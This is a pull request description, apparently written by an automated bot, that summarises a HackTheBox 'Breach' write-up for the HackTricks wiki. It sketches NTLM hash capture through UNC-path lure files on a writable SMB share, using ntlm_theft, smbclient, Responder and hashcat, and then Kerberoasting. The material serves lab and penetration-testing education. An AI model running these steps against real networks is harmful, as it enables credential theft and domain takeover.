HTB Breach

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2026/02/10/htb-breach.html
• Blog Title: HTB: Breach
• Suggested Section: Windows / Active Directory Methodology -> NTLM -> Places to steal NTLM creds (add subsection: 'Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)') and cross-link from 'Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks' and from 'Active Directory Methodology -> Kerberoast' (add NetExec ldap --kerberoast example)

🎯 Content Summary

Title / Target: HackTheBox “Breach” is a Windows Domain Controller running Windows Server 2022 (Build 20348) with hostname BREACHDC in domain breach.vl. The post demonstrates a practical domain compromise path starting from guest SMB write access to NTLM credential interception, then Kerberoasting to recover a service account password. The intro also states the intended endgame chain: silver ticket → MSSQL sysadmin → xp_cmd...

🔧 Technical Details

NTLM capture via writable SMB share lures (UNC-path coercion): If you can write to an SMB share that users/systems browse, drop files whose content references an attacker UNC path (e.g., \\10.10.14.16\share). Windows Explorer rendering (and some file handlers on open) can trigger automatic SMB authentication, producing a NetNTLMv2 challenge/response that tools like Responder can capture. Generate broad lure coverage with ntlm_theft.py -g all -s <attacker_ip> -f <base>, upload via smbclient (mput *), capture with Responder.py -I <iface>, then crack offline with hashcat (NetNTLMv2 autodetects to mode 5600).

Kerberoasting via LDAP (etype 23 TGS cracking): With any valid domain creds, request/collect Kerberos service tickets for SPN-bearing accounts and extract $krb5tgs$23$ material (RC4-HMAC / etype 23) for offline cracking. NetExec can automate extract...

🤖 Agent Actions

Updated HackTricks with new NTLM lure technique and tooling:

• Added detailed “writable SMB share + Explorer UNC lures” workflow to NTLM credential theft page, including ntlm_theft generation, SMB upload, Responder capture, and cracking guidance, plus reference to Breach blog.
• Cross-linked LLMNR/NBT-NS/DNS/WPAD relay page to the new lure workflow and added the Breach reference.
• Enhanced Kerberoast page with NetExec LDAP kerberoast example and cited Breach blog in references.

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/02/10/htb-breach.html

Content Categories: Based on the analysis, this content was categorized under "Windows / Active Directory Methodology -> NTLM -> Places to steal NTLM creds (add subsection: 'Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)') and cross-link from 'Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks' and from 'Active Directory Methodology -> Kerberoast' (add NetExec ldap --kerberoast example)".

Repository Maintenance:

• MD Files Formatting: 944 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

[carlospolop]

merge